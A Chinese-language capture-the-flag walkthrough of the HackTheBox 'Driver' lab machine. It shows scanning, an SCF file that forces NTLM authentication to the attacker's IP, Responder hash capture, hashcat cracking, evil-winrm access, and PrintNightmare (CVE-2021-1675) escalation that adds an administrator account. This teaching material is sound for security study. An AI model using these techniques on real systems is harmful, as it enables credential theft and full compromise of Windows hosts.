Hackthebox:Driver 记录
字数 1221 2025-08-18 17:33:30
HackTheBox: Driver 靶机渗透教学文档
1. 靶机概述
- 难度等级:HackTheBox官方认定的Easy难度
- IP地址:10.10.11.106
- 攻击机IP:10.10.16.5 (Kali Linux)
- 主要攻击路径:SMB Share SCF文件攻击 → NTLM哈希捕获 → WinRM登录 → 打印机驱动漏洞提权
2. 初始信息收集
2.1 网络配置
确保攻击机与靶机网络连通:
ping 10.10.11.106
如果延迟高,可通过代理优化:
- 在OpenVPN配置文件中添加:
socks-proxy 127.0.0.1 1088
或
http-proxy 127.0.0.1 8888
2.2 端口扫描
TCP端口扫描:
sudo nmap --min-rate 10000 -p- 10.10.11.106
UDP端口扫描(可选):
sudo nmap -sU --min-rate 10000 -p- 10.10.11.106
详细服务扫描:
sudo nmap -sT -sV -O -p80,135,445,5985 10.10.11.106
漏洞脚本扫描:
sudo nmap --script=vuln -p80,135,445,5985 10.10.11.106
3. 服务枚举与初始访问
3.1 Web服务(80端口)
发现需要认证的Web界面,尝试弱口令:
- 成功使用
admin:admin登录
3.2 文件上传尝试
- 尝试上传Web Shell
- 上传显示成功但无法确定路径
- 尝试目录扫描未果
- 尝试SQL注入和命令执行均失败
4. SMB Share - SCF文件攻击
4.1 攻击原理
利用SCF文件强制目标系统向攻击者发送NTLM认证请求,从而捕获哈希值。
4.2 实施步骤
- 创建SCF文件(保存为attack.scf):
[Shell]
Command=2
IconFile=\\10.10.16.5\L7
[Taskbar]
Command=ToggleDesktop
- 启动Responder监听:
sudo responder -I tun0
-
上传SCF文件到目标SMB共享
-
捕获NTLM哈希:
- 使用hashcat破解捕获的哈希:
hashcat -m 5600 hash.txt wordlist.txt
- 成功破解出密码:
liltony
5. WinRM登录
5.1 初始登录尝试
evil-winrm -i 10.10.11.106 -u tony -p liltony
5.2 常见问题解决
如果遇到SSL相关错误,可能需要修改OpenSSL配置:
- 编辑
/etc/ssl/openssl.cnf - 添加或取消注释以下内容:
default_conf
openssl_conf = openssl_init
[openssl_init]
providers = provider_sect
[provider_sect]
default = default_sect
legacy = legacy_sect
[default_sect]
activate = 1
[legacy_sect]
activate = 1
- 如果Ruby版本问题导致evil-winrm无法工作:
# 查看可用Ruby版本
apt-cache search ruby | grep 3
# 安装新版本
sudo apt-get install ruby3.2
# 创建符号链接
sudo ln -sf /usr/bin/ruby3.2 /usr/bin/ruby
- 终极解决方案:使用干净的Kali环境
6. 权限提升
6.1 信息收集
- 下载并运行WinPEAS:
wget https://github.com/carlospolop/peass-ng/releases/download/20221006/winpeasx64.exe
upload /path/to/winpeasx64.exe
- 检查PowerShell历史记录:
- 发现添加了RICOH PCL6打印机驱动程序的记录
6.2 利用打印机驱动漏洞(CVE-2021-1675)
- 下载漏洞利用脚本:
git clone https://github.com/calebstewart/CVE-2021-1675
- 上传并执行:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # 默认添加adm1n/P@ssw0rd到本地管理员组
或
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
- 使用新创建的管理员账户登录:
evil-winrm -i 10.10.11.106 -u adm1n -p P@ssw0rd
7. 获取Flag
- 用户Flag:
user.txt - 系统Flag:
root.txt
8. 总结与学习要点
-
关键攻击路径:
- SCF文件攻击获取NTLM哈希
- WinRM远程管理
- 打印机驱动漏洞提权
-
技术要点:
- SMB共享的安全风险
- NTLM认证的脆弱性
- Windows打印机驱动漏洞利用
- 渗透测试中的环境问题解决
-
参考资源:
- CVE-2021-1675漏洞利用:https://github.com/calebstewart/CVE-2021-1675
- WinPEAS:https://github.com/carlospolop/peass-ng
- Evil-WinRM:https://github.com/Hackplayers/evil-winrm